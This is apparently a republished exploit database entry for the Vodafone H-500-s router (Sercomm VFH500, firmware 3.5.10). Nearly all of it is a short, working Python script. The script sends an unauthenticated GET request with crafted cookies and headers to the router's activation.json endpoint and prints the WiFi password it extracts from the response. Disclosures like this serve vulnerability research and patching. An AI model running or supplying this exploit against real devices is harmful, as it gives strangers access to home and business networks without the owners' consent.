[webapps] Vodafone H-500-s 3.5.10 - WiFi Password Disclosure

4 months ago 30
# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure # Date: 01/01/2022 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.vodafone.es/ # Software Link: N/A # Version: Firmware version Vodafone-H-500-s-v3.5.10 # Hardware model: Sercomm VFH500 # The WiFi access point password gets disclosed just by performing a GET request with certain headers import requests import sys import json if len(sys.argv) != 2: print("Usage: python3 vodafone-pass-disclose.py http://IP") sys.exit() url = sys.argv[1]+"/data/activation.json" cookies = {"pageid": "129"} headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} req=requests.get(url, headers=headers, cookies=cookies) result=json.loads(req.text)[3].get("wifi_password") print("[+] The wifi password is: "+result)
Read Entire Article